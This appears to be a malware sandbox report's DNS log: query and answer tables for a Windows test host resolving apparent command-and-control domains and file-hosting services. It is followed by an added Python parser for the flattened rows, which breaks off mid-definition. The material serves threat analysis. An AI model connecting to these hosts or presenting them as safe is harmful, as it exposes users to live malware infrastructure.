Jan 14, 2022 09:25:07.781980991 CET  192.168.2.4  8.8.8.8  0x9e69    Standard query (0)  data-host-coin-8.com   A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:10.059603930 CET  192.168.2.4  8.8.8.8  0x36a9    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:10.232727051 CET  192.168.2.4  8.8.8.8  0x93a7    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:10.402065992 CET  192.168.2.4  8.8.8.8  0xbaac    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:10.569469929 CET  192.168.2.4  8.8.8.8  0x8806    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:14.421874046 CET  192.168.2.4  8.8.8.8  0x90eb    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:14.614980936 CET  192.168.2.4  8.8.8.8  0xfe69    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:14.780625105 CET  192.168.2.4  8.8.8.8  0x9c      Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.975579023 CET192.168.2.48.8.8.80xa24eStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:16.770625114 CET192.168.2.48.8.8.80x73edStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:16.948978901 CET192.168.2.48.8.8.80xcf20Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:17.118690014 CET192.168.2.48.8.8.80x702fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:35.734503031 CET192.168.2.48.8.8.80xaa98Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.404217958 CET192.168.2.48.8.8.80x571Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.500076056 CET192.168.2.48.8.8.80xe74cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.686891079 CET192.168.2.48.8.8.80x7390Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.855894089 CET192.168.2.48.8.8.80x8cdcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.023346901 CET192.168.2.48.8.8.80xffa9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.190979004 CET192.168.2.48.8.8.80xfc72Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.357533932 CET192.168.2.48.8.8.80x3b0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.527564049 CET192.168.2.48.8.8.80x920Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.692435980 CET192.168.2.48.8.8.80x24e6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.905060053 CET192.168.2.48.8.8.80x4803Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.069976091 CET192.168.2.48.8.8.80x5683Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.237016916 CET192.168.2.48.8.8.80xf82aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.408840895 CET192.168.2.48.8.8.80x3a0dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.596249104 CET192.168.2.48.8.8.80x19d5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.764209986 CET192.168.2.48.8.8.80x2a54Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:44.216681957 CET192.168.2.48.8.8.80xb533Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:44.395333052 CET192.168.2.48.8.8.80xf8e5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:44.580280066 CET192.168.2.48.8.8.80x709aStandard query (0)goo.suA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.040406942 CET192.168.2.48.8.8.80x2e9cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.207436085 CET192.168.2.48.8.8.80x4d69Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.357714891 CET192.168.2.48.8.8.80x7264Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.525964975 CET192.168.2.48.8.8.80x4cdbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.691128969 CET192.168.2.48.8.8.80xec9aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.881808043 CET192.168.2.48.8.8.80x4146Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:46.060853004 CET192.168.2.48.8.8.80x3909Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:48.854824066 CET192.168.2.48.8.8.80x387Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:49.086039066 CET192.168.2.48.8.8.80xe7dcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:49.422725916 CET192.168.2.48.8.8.80x9abcStandard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:50.660095930 CET192.168.2.48.8.8.80x6f10Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:50.825428963 CET192.168.2.48.8.8.80x450bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:51.017307043 CET192.168.2.48.8.8.80xc9d6Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:55.965636969 CET192.168.2.48.8.8.80x9c3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.136208057 CET192.168.2.48.8.8.80xbfd2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.302062988 CET192.168.2.48.8.8.80x9b36Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.494359016 CET192.168.2.48.8.8.80xa220Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.717469931 CET192.168.2.48.8.8.80xe9f1Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:02.268810034 CET192.168.2.48.8.8.80x327Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:02.440820932 CET192.168.2.48.8.8.80xd067Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:02.614178896 CET192.168.2.48.8.8.80x6ba5Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:07.254791021 CET192.168.2.48.8.8.80x56c5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:07.447556973 CET192.168.2.48.8.8.80xd10bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:07.803284883 CET192.168.2.48.8.8.80x33c6Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.037647009 CET192.168.2.48.8.8.80x8385Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.210942030 CET192.168.2.48.8.8.80xcd06Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.423469067 CET192.168.2.48.8.8.80x5a80Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.783442020 CET192.168.2.48.8.8.80x6be3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.954782009 CET192.168.2.48.8.8.80x21fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:18.736825943 CET192.168.2.48.8.8.80xe7c1Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:25.934835911 CET192.168.2.48.8.8.80x8983Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:27:08.800683975 CET192.168.2.48.8.8.80x62ddStandard query (0)patmushta.infoA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Jan 14, 2022 09:24:58.794605017 CET8.8.8.8192.168.2.40x85fbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:24:59.283950090 CET8.8.8.8192.168.2.40x61cbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:24:59.474836111 CET8.8.8.8192.168.2.40x35d0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:24:59.906702042 CET8.8.8.8192.168.2.40x9b0aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:00.082065105 CET8.8.8.8192.168.2.40x5fa1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:00.275962114 CET8.8.8.8192.168.2.40xd8c1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:01.666069984 CET8.8.8.8192.168.2.40xe4b6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:01.841012955 CET8.8.8.8192.168.2.40x8084No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:02.297612906 CET8.8.8.8192.168.2.40x92dfNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:04.487859011 CET8.8.8.8192.168.2.40x133bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:04.958055973 CET8.8.8.8192.168.2.40x824aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:05.424448967 CET8.8.8.8192.168.2.40x4276No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:05.763828993 CET8.8.8.8192.168.2.40xe630No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:06.228406906 CET8.8.8.8192.168.2.40x2f13No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:06.478178978 CET8.8.8.8192.168.2.40x6231No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:06.824743986 CET8.8.8.8192.168.2.40xdf03No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:07.291708946 CET8.8.8.8192.168.2.40xc429No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:07.460710049 CET8.8.8.8192.168.2.40x1c71No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:07.627312899 CET8.8.8.8192.168.2.40xdf90No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:08.099401951 CET8.8.8.8192.168.2.40x9e69No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:10.078922033 CET8.8.8.8192.168.2.40x36a9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:10.251872063 CET8.8.8.8192.168.2.40x93a7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:10.421320915 CET8.8.8.8192.168.2.40xbaacNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:10.588691950 CET8.8.8.8192.168.2.40x8806No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.441111088 CET8.8.8.8192.168.2.40x90ebNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.634314060 CET8.8.8.8192.168.2.40xfe69No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.799860001 CET8.8.8.8192.168.2.40x9cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.996831894 CET8.8.8.8192.168.2.40xa24eNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.996831894 CET8.8.8.8192.168.2.40xa24eNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.996831894 CET8.8.8.8192.168.2.40xa24eNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.996831894 CET8.8.8.8192.168.2.40xa24eNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.996831894 CET8.8.8.8192.168.2.40xa24eNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:16.788121939 CET8.8.8.8192.168.2.40x73edNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:16.968163013 CET8.8.8.8192.168.2.40xcf20No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:17.136274099 CET8.8.8.8192.168.2.40x702fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:35.761554003 CET8.8.8.8192.168.2.40xaa98No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:35.761554003 CET8.8.8.8192.168.2.40xaa98No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:35.761554003 CET8.8.8.8192.168.2.40xaa98No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:35.761554003 CET8.8.8.8192.168.2.40xaa98No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:35.761554003 CET8.8.8.8192.168.2.40xaa98No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:35.761554003 CET8.8.8.8192.168.2.40xaa98No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.421423912 CET8.8.8.8192.168.2.40x571No error (0)patmushta.info185.188.183.61A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.519500017 CET8.8.8.8192.168.2.40xe74cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.704005003 CET8.8.8.8192.168.2.40x7390No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.875216007 CET8.8.8.8192.168.2.40x8cdcNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.040910959 CET8.8.8.8192.168.2.40xffa9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.209981918 CET8.8.8.8192.168.2.40xfc72No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.377321959 CET8.8.8.8192.168.2.40x3b0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.547108889 CET8.8.8.8192.168.2.40x920No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.711781025 CET8.8.8.8192.168.2.40x24e6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.924561024 CET8.8.8.8192.168.2.40x4803No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.088764906 CET8.8.8.8192.168.2.40x5683No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.256330013 CET8.8.8.8192.168.2.40xf82aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.428683043 CET8.8.8.8192.168.2.40x3a0dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.615529060 CET8.8.8.8192.168.2.40x19d5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:41.087089062 CET8.8.8.8192.168.2.40x2a54No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:44.236279964 CET8.8.8.8192.168.2.40xb533No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:44.412606001 CET8.8.8.8192.168.2.40xf8e5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:44.609112024 CET8.8.8.8192.168.2.40x709aNo error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:44.609112024 CET8.8.8.8192.168.2.40x709aNo error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.059613943 CET8.8.8.8192.168.2.40x2e9cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.226744890 CET8.8.8.8192.168.2.40x4d69No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.376952887 CET8.8.8.8192.168.2.40x7264No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.545367956 CET8.8.8.8192.168.2.40x4cdbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.710396051 CET8.8.8.8192.168.2.40xec9aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.907784939 CET8.8.8.8192.168.2.40x4146No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:46.080140114 CET8.8.8.8192.168.2.40x3909No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:48.871977091 CET8.8.8.8192.168.2.40x387No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:49.104904890 CET8.8.8.8192.168.2.40xe7dcNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:49.450273991 CET8.8.8.8192.168.2.40x9abcNo error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:50.677923918 CET8.8.8.8192.168.2.40x6f10No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:50.844213963 CET8.8.8.8192.168.2.40x450bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:51.036268950 CET8.8.8.8192.168.2.40xc9d6No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:55.984693050 CET8.8.8.8192.168.2.40x9c3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.155317068 CET8.8.8.8192.168.2.40xbfd2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.321657896 CET8.8.8.8192.168.2.40x9b36No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.513890982 CET8.8.8.8192.168.2.40xa220No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.740719080 CET8.8.8.8192.168.2.40xe9f1No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | Address | Type | Class
Jan 14, 2022 09:26:02.287682056 CET | 8.8.8.8 | 192.168.2.4 | 0x327 | No error (0) | host-data-coin-11.com | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:02.458193064 CET | 8.8.8.8 | 192.168.2.4 | 0xd067 | No error (0) | host-data-coin-11.com | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:02.633424044 CET | 8.8.8.8 | 192.168.2.4 | 0x6ba5 | No error (0) | data-host-coin-8.com | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:07.274209023 CET | 8.8.8.8 | 192.168.2.4 | 0x56c5 | No error (0) | host-data-coin-11.com | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:07.467144966 CET | 8.8.8.8 | 192.168.2.4 | 0xd10b | No error (0) | host-data-coin-11.com | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:07.820511103 CET | 8.8.8.8 | 192.168.2.4 | 0x33c6 | No error (0) | data-host-coin-8.com | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:10.056818962 CET | 8.8.8.8 | 192.168.2.4 | 0x8385 | No error (0) | host-data-coin-11.com | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:10.230015039 CET | 8.8.8.8 | 192.168.2.4 | 0xcd06 | No error (0) | host-data-coin-11.com | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:10.449105978 CET | 8.8.8.8 | 192.168.2.4 | 0x5a80 | No error (0) | a0621298.xsph.ru | 141.8.194.74 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:10.800724030 CET | 8.8.8.8 | 192.168.2.4 | 0x6be3 | No error (0) | host-data-coin-11.com | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:10.973896980 CET | 8.8.8.8 | 192.168.2.4 | 0x21f | No error (0) | host-data-coin-11.com | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:18.754103899 CET | 8.8.8.8 | 192.168.2.4 | 0xe7c1 | No error (0) | patmushta.info | 185.188.183.61 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:25.962934971 CET | 8.8.8.8 | 192.168.2.4 | 0x8983 | No error (0) | microsoft-com.mail.protection.outlook.com | 40.93.207.1 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:25.962934971 CET | 8.8.8.8 | 192.168.2.4 | 0x8983 | No error (0) | microsoft-com.mail.protection.outlook.com | 52.101.24.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:25.962934971 CET | 8.8.8.8 | 192.168.2.4 | 0x8983 | No error (0) | microsoft-com.mail.protection.outlook.com | 40.93.207.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:25.962934971 CET | 8.8.8.8 | 192.168.2.4 | 0x8983 | No error (0) | microsoft-com.mail.protection.outlook.com | 104.47.53.36 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:25.962934971 CET | 8.8.8.8 | 192.168.2.4 | 0x8983 | No error (0) | microsoft-com.mail.protection.outlook.com | 104.47.54.36 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:25.962934971 CET | 8.8.8.8 | 192.168.2.4 | 0x8983 | No error (0) | microsoft-com.mail.protection.outlook.com | 40.93.212.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:27:08.820175886 CET | 8.8.8.8 | 192.168.2.4 | 0x62dd | No error (0) | patmushta.info | 185.188.183.61 | A (IP address) | IN (0x0001)
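
The DNS answer rows in this report are often exported without column separators, and the source and destination IP columns then run together, which makes naive splitting ambiguous: "8.8.8.8192.168.2.4" is also a valid pair "8.8.8.81" / "92.168.2.4". The Python below is an added example, not code from the Joe Sandbox report. It parses rows in that flattened layout, resolves the IP-pair ambiguity by preferring a known resolver as the source (assumed to be 8.8.8.8, which every row above uses), and builds a name-to-address map, then reports addresses that serve more than one queried name, which here ties host-data-coin-11.com and data-host-coin-8.com to 8.209.70.0. The sample rows are copied from the table above and embedded as constructed input.

```python
import re
from collections import defaultdict

# Constructed input: four DNS answer rows from the report, in the separator-less
# layout an HTML-to-text export produces.
FLAT_ROWS = [
    "Jan 14, 2022 09:26:02.287682056 CET8.8.8.8192.168.2.40x327No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)",
    "Jan 14, 2022 09:26:02.633424044 CET8.8.8.8192.168.2.40x6ba5No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)",
    "Jan 14, 2022 09:26:10.449105978 CET8.8.8.8192.168.2.40x5a80No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)",
    "Jan 14, 2022 09:26:25.962934971 CET8.8.8.8192.168.2.40x8983No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)",
]

# Assumption: the sandbox resolver is 8.8.8.8 (every row on the page shows it as source).
KNOWN_RESOLVERS = frozenset({"8.8.8.8"})

ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]{3,4})"
    r"(?P<ips>[\d.]+?)"                  # source IP and destination IP, run together
    r"(?P<tid>0x[0-9a-fA-F]+)"           # DNS transaction ID
    r"(?P<rcode>[A-Za-z ]+\(\d+\))"      # e.g. "No error (0)"
    r"(?P<name>[a-z0-9.-]*[a-z])"        # queried name; a TLD always ends in a letter
    r"(?P<addr>\d{1,3}(?:\.\d{1,3}){3})" # answer address, bounded by the literal type text
    r"(?P<rtype>A \(IP address\))"
    r"(?P<rclass>IN \(0x[0-9a-fA-F]{4}\))$"
)


def valid_ip(s):
    """Strict dotted-quad check: four decimal octets, no leading zeros, each <= 255."""
    parts = s.split(".")
    if len(parts) != 4:
        return False
    for p in parts:
        if not p.isdigit() or (len(p) > 1 and p[0] == "0") or int(p) > 255:
            return False
    return True


def split_two_ips(run, resolvers=KNOWN_RESOLVERS):
    """Split 'A.B.C.DE.F.G.H' into (src, dst).

    The flattening is lossy: every cut that yields two valid dotted quads is a
    candidate, so prefer the one whose source is a known resolver and refuse to
    guess when that does not single out exactly one split.
    """
    cands = [(run[:i], run[i:]) for i in range(1, len(run))
             if valid_ip(run[:i]) and valid_ip(run[i:])]
    preferred = [c for c in cands if c[0] in resolvers]
    if len(preferred) == 1:
        return preferred[0]
    if len(cands) == 1:
        return cands[0]
    raise ValueError(f"ambiguous IP pair {run!r}: {cands}")


def parse_row(line):
    """Parse one flattened answer row into a dict of named fields."""
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised row: {line!r}")
    rec = m.groupdict()
    rec["src"], rec["dst"] = split_two_ips(rec.pop("ips"))
    return rec


def resolutions(lines):
    """name -> set of answer addresses, counting only successful replies."""
    out = defaultdict(set)
    for rec in map(parse_row, lines):
        if rec["rcode"].startswith("No error"):
            out[rec["name"]].add(rec["addr"])
    return dict(out)


def shared_hosts(res):
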